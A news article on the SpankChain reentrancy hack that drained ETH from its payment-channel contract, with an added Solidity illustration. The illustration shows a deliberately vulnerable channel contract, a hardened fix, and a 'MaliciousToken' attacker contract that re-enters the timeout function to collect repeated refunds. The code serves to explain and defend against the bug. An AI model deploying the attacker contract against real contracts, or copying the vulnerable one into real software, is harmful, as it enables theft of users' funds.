Attackers have exploited a reentrancy bug in the payment channel smart contract of an adult-industry-focused cryptocurrency project.
The Ethereum-based contract handles an ERC20 token ‘creatively’ named BOOTY for adult-industry payments company SpankChain, which lost roughly £28,000 to the attack.
The company announced on Medium that: “At 6pm PST Saturday, an unknown attacker drained 165.38 ETH (~$38,000) from our payment channel smart contract which also resulted in $4,000 worth of BOOTY on the contract becoming immobilized.”
The theft went unnoticed for about a day: SpankChain discovered it on Sunday at 7pm and, recognising the seriousness of the situation, took all of its online services down while it worked to contain the issue.
SpankChain has suspended its website while it redeploys a patched version of the payment channel contract to stop further attacks, and says it will refund all users affected by the hack.
The company stated in the post that the “attack capitalized on a ‘reentrancy’ bug, much like the one exploited in The DAO. The attacker created a malicious contract masquerading as an ERC20 token, where the ‘transfer’ function called back into the payment channel contract multiple times, draining some ETH each time.”
“The malicious contract first called createChannel to set up the channel, then called LCOpenTimeout repeatedly via reentrancy. The LCOpenTimeout is there to allow users to quickly exit payment channels which have not yet been joined by the counter-party,” they reported.
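The mechanism described in the two quotes above is worth seeing in code. The token address in a payment channel is supplied by the channel's creator, so when the contract calls that token's `transfer` it is handing control to attacker-chosen code; if the channel's state is only cleared after that call, the attacker can call the timeout function again while the channel still looks open and be refunded repeatedly. The following is an added example written for this article, not SpankChain's code: the struct layout, the `openTimeout` name (standing in for `LCOpenTimeout`), the omitted time-out check and the attacker contract are all assumptions made to illustrate the pattern. The vulnerable contract is shown beside a hardened one that applies checks-effects-interactions and a reentrancy guard.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical reconstruction, not SpankChain's code. The struct layout,
// the name openTimeout (standing in for LCOpenTimeout) and the omitted
// time-out check are assumptions made for the example.
interface IERC20Like {
    function transfer(address to, uint256 amount) external returns (bool);
}

abstract contract ChannelBase {
    struct Channel {
        address owner;
        IERC20Like token;      // caller-supplied: attacker-controlled code
        uint256 ethBalance;
        uint256 tokenBalance;
        bool open;
    }
    mapping(bytes32 => Channel) public channels;

    // Funds the ETH side of a new channel. Pulling the token deposit via
    // transferFrom is left out to keep the example short.
    function createChannel(bytes32 id, IERC20Like token, uint256 tokenAmount) external payable {
        require(channels[id].owner == address(0), "channel exists");
        channels[id] = Channel(msg.sender, token, msg.value, tokenAmount, true);
    }

    function openTimeout(bytes32 id) external virtual;
}

// VULNERABLE: the channel is deleted only after two external calls. When
// token.transfer() hands control to a malicious token, it can call
// openTimeout again while the channel still looks open and collect the ETH
// refund once more per round, paid out of the contract's pooled balance.
contract VulnerableChannel is ChannelBase {
    function openTimeout(bytes32 id) external override {
        Channel storage c = channels[id];
        require(c.open && c.owner == msg.sender, "no open channel for caller");
        (bool ok, ) = c.owner.call{value: c.ethBalance}("");
        require(ok, "eth refund failed");
        c.token.transfer(c.owner, c.tokenBalance);  // <- re-entry point
        delete channels[id];                        // effect applied too late
    }
}

// HARDENED: checks-effects-interactions (state cleared before any external
// call) plus a mutex, so a re-entrant call fails the "open" check and the
// guard.
contract HardenedChannel is ChannelBase {
    uint256 private lock = 1;
    modifier nonReentrant() {
        require(lock == 1, "reentrant call");
        lock = 2;
        _;
        lock = 1;
    }

    function openTimeout(bytes32 id) external override nonReentrant {
        Channel memory c = channels[id];            // snapshot, then ...
        require(c.open && c.owner == msg.sender, "no open channel for caller");
        delete channels[id];                        // ... effect before interactions
        (bool ok, ) = c.owner.call{value: c.ethBalance}("");
        require(ok, "eth refund failed");
        require(c.token.transfer(c.owner, c.tokenBalance), "token refund failed");
    }
}

// Attacker contract masquerading as an ERC20 token: it opens a channel that
// names itself as the token, then re-enters openTimeout from transfer().
contract MaliciousToken is IERC20Like {
    ChannelBase public target;
    bytes32 private id;
    uint256 private rounds;

    constructor(ChannelBase t) { target = t; }

    // Against VulnerableChannel this collects (n + 1) * msg.value in ETH.
    function attack(bytes32 channelId, uint256 n) external payable {
        id = channelId;
        rounds = n;
        target.createChannel{value: msg.value}(channelId, this, 0);
        target.openTimeout(channelId);
    }

    function transfer(address, uint256) external override returns (bool) {
        if (rounds > 0) {
            rounds--;
            target.openTimeout(id);   // re-enter while the channel is still open
        }
        return true;
    }

    receive() external payable {}     // accept the repeated ETH refunds
}
```

Against `VulnerableChannel` each nested call passes the `open` check because the `delete` has not yet run, so the attacker is refunded its deposit once per round; the extra ETH comes from other users' channels sitting in the same contract, which is why the loss can exceed the attacker's own stake and stops only when the contract's balance or the gas runs out. Against `HardenedChannel` the nested call reverts on the guard (and would fail the `open` check even without it), that revert bubbles up through the malicious `transfer`, and the whole transaction is undone. One caveat a reviewer should note: a malicious token can still make the refund of its own channel revert, which is a griefing risk for that channel alone, not a drain.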
SpankChain admitted that the problem was largely of its own making. For an earlier unidirectional payment channels library it had commissioned an audit from Zeppelin at a cost of $17,000, which it felt at the time was somewhat expensive.
So when it came to apply the same security diligence to a “far more sophisticated non-custodial payment channel contract”, the company decided that the quoted $30,000 to $50,000 for an audit was too costly and went without one.
Having taken a hard spanking, the company says it has learnt its lesson, noting that: “Taking into account both the perception value and opportunity cost of the time spent reacting to the hack, it would have been worth it.”